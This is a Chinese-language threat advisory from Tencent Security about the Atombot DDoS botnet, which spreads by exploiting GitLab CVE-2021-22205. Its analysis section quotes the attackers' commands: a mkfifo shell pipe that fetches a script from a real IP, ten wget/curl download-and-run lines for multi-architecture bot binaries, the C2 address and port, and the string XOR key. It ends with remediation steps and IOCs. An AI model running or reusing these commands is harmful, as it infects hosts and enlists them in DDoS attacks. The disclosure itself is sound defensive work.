产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec DDos防护
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
等保合规服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
运维解决方案
品牌保护解决方案
高防云主机安全
腾讯安心平台解决方案
行业解决方案
游戏行业安全方案
电商行业安全方案
零售行业安全方案
安全专项解决方案
勒索病毒专项解决方案
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
考试入口
证书查询
开启你的安全之旅
联系我们
寻求市场合作
友情链接
腾讯云
未登录- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
正文警惕:DDOS僵尸网络Atombot正攻击云主机
2022-06-02 01:57:59
一、概述
腾讯安全威胁情报中心检测到,有攻击者使用Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)对云主机展开攻击,若攻击成功会投递DDoS僵尸木马并连接C2,可控制肉鸡对互联网上的其他设备发起DDoS攻击,因其木马样本中硬编码了字符串“Atom_bot”,我们将其命名为Atombot僵尸网络。
Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205),未正确验证传递到GitLab文件解析器的图像文件可导致远程代码执行。由于 Gitlab 某些端点路径无需授权,攻击者可在无需认证的情况下利用图片上传功能执行任意代码。
Gitlab exiftool 远程命令执行漏洞是2021年4月披露并已修复的高危漏洞,CVSS评分为10(最高分),该漏洞一经出现,就得到众多网络黑产青睐,成为最常用的攻击武器之一。
腾讯安全专家强烈建议受影响的用户将GitLab升级到最新版本。下载链接:https://about.gitlab.com/update/
腾讯安全旗下安全产品已支持全面检测防御该漏洞的攻击利用:
腾讯T-Sec漏洞扫描服务、腾讯T-Sec主机安全(云镜)、腾讯容器安全服务(TCSS)已支持检测企业资产(主机、容器及镜像)是否存在Gitlab ExifTool远程命令执行漏洞(CVE-2021-22205);
腾讯T-Sec高级威胁检测系统(NTA,御界)、腾讯T-Sec 云防火墙、腾讯T-Sec Web应用防火墙(WAF)均已支持检测、拦截利用GitLab ExifTool远程代码执行漏洞的攻击活动;
腾讯T-Sec主机安全(云镜)已支持对Atombot相关僵尸网络木马样本的查杀清除。
二、分析
Atombot利用Gitlab exiftool漏洞攻击成功后执行脚本bins.sh:
sh -c TF=$(mktemp -u);mkfifo $TF && rm -rf bins.sh; rm -rf x86; rm -rf *.x86; wget http[:]//179.61.251.10/bins.sh; chmod 777 *; sh bins.sh 0<$TF | sh 1>$TF
脚本下载包括针对x86、mips、arm等CPU架构的样本:
cd /tmp; wget http[:]//179.61.251.10/bins/flow.arm7; curl http[:]//179.61.251.10/bins/flow.arm7 -O flow.arm7; chmod 777 flow.arm7; ./flow.arm7 exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.arm6; curl http[:]//179.61.251.10/bins/flow.arm6 -O flow.arm6; chmod 777 flow.arm6; ./flow.arm6 exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.arm5; curl http[:]//179.61.251.10/bins/flow.arm5 -O flow.arm5; chmod 777 flow.arm5; ./flow.arm5 exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.arm; curl http[:]//179.61.251.10/bins/flow.arm -O flow.arm; chmod 777 flow.arm; ./flow.arm exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.x86; curl http[:]//179.61.251.10/bins/flow.x86 -O flow.x86; chmod 777 flow.x86; ./flow.x86 exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.mips; curl http[:]//179.61.251.10/bins/flow.mips -O flow.mips; chmod 777 flow.mips; ./flow.mips exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.mpsl; curl http[:]//179.61.251.10/bins/flow.mpsl -O flow.mpsl; chmod 777 flow.mpsl; ./flow.mpsl exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.spc; curl http[:]//179.61.251.10/bins/flow.spc -O flow.spc; chmod 777 flow.spc; ./flow.spc exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.sh4; curl http[:]//179.61.251.10/bins/flow.sh4 -O flow.sh4; chmod 777 flow.sh4; ./flow.sh4 exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.m68k; curl http[:]//179.61.251.10/bins/flow.m68k -O flow.m68k; chmod 777 flow.m68k; ./flow.m68k exploit
以flow.x86为例进行分析,样本除了“Atom_bot”外,其余关键字符串均被加密。
启动后会先检查有无参数,没有参数直接退出。然后将内置的加密数据依次与0d f0 ad ba进行异或得到解密后的字符串。
解密并打印字符“aisu_bot[Killing”,然后使用随机字符串隐藏进程名。
读取硬编码在代码中的IP地址和端口作为C2连接,C2地址为179.61.251.10:420。
通过调用Linux系统第102号(0x66)syscall进入socketcall(),并且通过参数3定位执行conncet网络连接函数。
Linux系统调用表:
系统调用入口socketcall()中不同参数对应不同的系统函数,木马通过调用sys_socket,sys_connect,sys_getsockname,sys_send,sys_recv等函数实现与C2地址的网络通信。
连接成功后,被控端首先发送4个字节上线请求,然后发送8个字节的参数” .exploit”,控制端返回数据后,解密出命令并退出进程或执行DDoS攻击等操作。
木马向控制端发送和返回心跳包:
三、安全建议及处置手册
腾讯安全专家建议企业用户参考以下方法排查风险,消除威胁。
1.通过腾讯主机安全(云镜)扫描排查主机是否存在流行高危漏洞,及时根据提示信息修复相关漏洞;
主机安全(云镜)控制台:打开漏洞管理->Web应用漏洞管理,点击一键检测
查看扫描到的Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)风险项目。
确认存在Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)的资产IP。运维人员登录该资产,将Gitlab升级到最新版本。
回到腾讯主机安全(云镜)控制台再次打开“漏洞管理”,重新检测,确保已修复漏洞的资产IP已不再被检测到。
2.配置腾讯云防火墙对恶意利用Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)的攻击进行防御:
在腾讯云防火墙控制台界面,打开入侵防御设置即可。
3.建议配置使用强密码进行登陆验证,不使用弱密码或默认密码。
推荐通过腾讯云防火墙配置微信扫码登录主机,避免因操作人员帐号密码泄露导致黑客远程登录,或遭遇弱密码爆破攻击;
详细操作步骤可参考“腾讯云防火墙运维实例:远程登录”(https://cloud.tencent.com/document/product/1132/53012)
4.检测发现感染僵尸木马程序后,及时清除恶意样本,以彻底消除威胁。
通过腾讯主机安全(云镜)控制台,入侵检测->文件查杀,检测全网资产,在资产列表右侧输入资产IP地址,检测恶意文件,发现后一键隔离操作。操作步骤:
A: 主机安全(云镜)控制台:入侵检测->文件查杀,选择一键检测:
B:弹出一键检测设置,选择快速扫描,勾选“全部专业版主机”,开启扫描:
C:查看扫描出的木马风险结果项
D:对Atombot僵尸网络木马进行一键隔离(注意勾选隔离同时结束木马进程选项)
IOCs
MD5
99e95e15ed161cf4a5ff8167de5f495f
89b0666a5656ab7407a67e5af8cf9b6f
e55082237c555b2f3f1cc55eca27a8fe
6dca32a8ce6f0dc667c39c299714680b
a04e168cd4523b2aaf2271cccfdc5597
参考链接:
https://mp.weixin.qq.com/s/Xzz_3VYFGi7hFHBplOOLZQ
https://cocomelonc.github.io/tutorial/2021/10/17/linux-shellcoding-2.html
扫描以下二维码关注“腾讯安全威胁情报中心”公众号,掌握最新的网络安全威胁情报。
在线咨询